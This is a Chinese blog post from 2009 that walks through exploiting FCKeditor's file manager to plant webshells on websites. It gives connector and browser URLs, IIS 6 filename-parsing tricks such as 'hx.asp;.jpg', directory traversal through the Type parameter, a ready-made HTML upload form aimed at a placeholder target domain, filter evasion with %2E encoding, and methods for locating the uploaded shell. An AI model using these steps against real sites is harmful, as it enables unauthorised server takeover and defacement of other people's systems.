首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
对Fckeditor的一些漏洞总结
来源:http://hi.baidu.com/isbx/blog 作者:isbx 发布时间:2009-12-16  
 

对Fckeditor的一些漏洞总结当然这都是网上公开过的....这次把他总结出来..放到blog上希望对大家有所帮助


Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp

当你知道fckeditor目录时..你输入以上地址..就会看到有个上传的地方..如图所示:

 

 

 



这里有个上传的地方...老版本的fckeditor可以上传.Asa后缀的文件(也就是你的马) 如

果不行的话...我们可以利用iis的路径解析漏洞.建一个hx.Asp的目录.再这目录下上传马

还可以上传“图片”.这里指的图片是.Jpg格式后缀的马(结合iis6.0的解析漏洞

hx.Asp;.Jpg)以上效果如图所示:

因为版本的不同..有些管理员会把一些没用的目录删除..比如我是aspx的站..就会把asp.Php的目录删了..

那么这时候自己就要改..fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx

改成这样是一样的..也有时候有的站会把asp破坏掉..而这时假到aspx php都没有做任何

破坏..所以有时修自己多跳下目录..browser.html?Type=Image这里image是表示类型..

如果你打不开fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp里..可以试着打开

fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.Asp

..Type类型可以自己改.我没碰到过..

fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.Asp

这样的可以跳到根目录...很少碰到...不过也不是不存在这样的站...这里也可以把全站目

录列出来..

那么这样都被破坏了..也都不行了...那要怎么办呢..在connectors目录下有个test.Html

文件..那里也可以上传..可以上传任意文件他都会返回一个地址给你..如图所示:

虽然是

返回不允许上传的类型..但还是会返回地址..那个路径是在下面框里查看源文件得到的...

上传cer有时候也行.hx.Jpg;hx.Jpg 都行...在test.Html页面里有几个地方要注意..

Connector 也就是Connector=connectors/asp/connector.Asp是一个样的哈..有aspx php

等..其实都只是调用..如果asp不行..换aspx php 同上方法...还有一个是本地构造上传

的源码如下:

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com.cn/fckeditor/editor/filemanager/browser/default/connectors/asp/upload.asp?Type=Media" method="post">

Upload a new file:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>

没了test.Html这里也还可以上传..一样的效果..有些网站的connectors/asp/upload.Asp

所在的目录不一定相同...有的是fckeditor/editor/connectors/asp/upload.Asp这路径..

And so on 补上一个知识...有时候上传的木马名hx.Asp;hx.Jpg hx.Asp这个时候会被过

滤掉前面的.我们可以把.进行url编码下成%2E(成功机率没测试过)

   下面就是找路径的方法了...上传上去的马别找不到路径那就完了..在

fckeditor/editor/目录下有个fckeditor.Html文件..我们访问如图所示:那么我们怎么找

上传马的路径呢??我们打开上面一个超链接的按钮..如图所示:

有个浏览服务器..我们打开.如图所示:

找到自己的马点两下你就会发现马的路径已经在你面前了...如图所示:

 

里面有个图片上传(同理)

那么要是没有这个fckeditor.Html 或者fckeditor.Html打开是“空白页面”呢?

我们还有种方法来列出目录..如图所示:

fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F 这是列出file目录的路径.有的可以列..当然版本不

有的显示不同..也有的不能列出来..还有种是那个本地构造的上传怎么找马...当你按下

upload按钮时就会跳到一个页面..右键查看源文件就可以知道路径了...再还有网上的一

种用遨游浏览器的方法..比较麻烦...呵呵...还有种方法就是经验的老道了...也可以扫全

站目录来猜你马的目录路径...And so on

好了总结的也差不多了..如果我哪里没有总结到..请大家指出来... Php jsp等那些版本

的漏洞..精简版的国内很少了吧.国外的有蛮多的...这里都不提了...


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·MvMmall漏洞分析
·php168 v6.0拿shell漏洞
·supersite7.5找回密码的鸡肋问题
·Google Wave XSS(Unpatched)
·PHPMPS 0day
·Discuz!的最新拿Webshell法,测
·dvbbs 8.2前台0day
·PHP漏洞全解(六)-跨网站请求伪造
·PHP漏洞全解(五)-SQL注入攻击
·PHP漏洞全解(四)-xss跨站脚本攻
·PHP漏洞全解(三)-客户端脚本植入
·PHP漏洞全解(二)-命令注入攻击
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved